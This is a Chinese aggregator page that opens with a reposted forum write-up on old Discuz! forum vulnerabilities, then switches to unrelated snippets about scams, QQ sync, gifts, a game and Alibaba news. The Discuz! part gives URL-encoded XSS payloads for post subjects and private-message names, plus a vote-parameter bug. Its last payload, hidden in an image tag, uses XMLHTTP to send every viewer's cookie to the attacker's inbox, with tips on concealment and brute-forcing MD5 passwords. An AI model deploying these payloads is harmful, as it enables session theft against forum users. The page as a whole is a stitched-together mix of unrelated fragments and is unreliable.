每日好文
攻防实验室的是这个论坛,于是找了一下资料,贴在这里============在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。 例如 http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用 *** :把上述代码放置到img中。 适用版本:discuz!2.x discuz!3.x 一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan) http://XXX/pm.php?action=send&username=XXXFan 因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如 http://XXX/pm.php?action=send&username=XXXFan ">里的内容加密,以进一步增加隐蔽性。 至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 本 *** 适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用 *** 请参与在我以前发表的discuz!悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n (n为选项,从0开始) 的方式通过URL来直接投票 但是如果n>更大选项呢,嘻嘻~ 照样提交成功,不过增加了一个标题为空的选项 效果见: http://discuz.net/viewthread.php?tid=20020&sid=dymPEc (那个最后的空白的是我刚加的) 该漏洞存在的版本: Discuz!3.X Discuz!2.X(可能,没有测试过) Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的,之一发现者(PK0909)。 具体的描述就不说了,下面是一个简单的测试代码。 http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E 上面的代码是显示出自己的cookie 下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了 [ img]http://pic.seo-6.com/Pupian/112020/mfy2j0sfl15-yseo_com.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCas
不能说的xs
因为新闻上面没有,我也替你查了下,没有任何关于那个小女孩的信息,不过那个小女孩真的好萌好可爱 应该是AmorChristina姓名:CristinaFernandezLee爱称:Cristina、Ti...
我也想找个黑客。我的钱也被骗了,我现在是个宝妈,没有收入还被骗了。没敢告诉家里人怕他们生气。 你还真不怕黑客骗你第二回,别找黑客了,赶紧报警 及时报警。国家已经出台政策了,现在很多网上金钱交易,24小...
其实同步这种东西想要去操作也是非常简单的,有的时候我们日常想要去同步一个聊天记录的时候是非常容易的,比如说我们想要在QQ上去操作,只要是我们点击电脑版的QQ,然后登录一下,这样QQ的手机版收到了什么样...
小孩生日了,爸爸和妈妈毫无疑问会出现许多的感叹,小孩生日是一个让母亲较为有感受的事儿,大部分妈妈生孩子都生得十分的艰辛,因此 小孩的生日也是母亲的受难日,那麼小孩七岁生日发什么纪念金币比较好呢,我就而...
三国志幻想大陆是最近上线的一个游戏,这个游戏中,阵容十分关键,玩家需要用自己有的英雄搭配出阵容,然后进行战斗,那么,什么阵容比较好呢?如何进行阵容搭配呢,这里为大家带来一款土豪反伤队阵容。土豪反伤队是...
台湾媒体上周五报道,台湾经济部投资审议委员会认为,阿里巴巴试图借助某新加坡注册实体来隐瞒自己的中国大陆企业身份,并因此被罚款12万新台币(约合2.4万人民币),同时撤出该市场。对此,阿里巴巴表示,公司...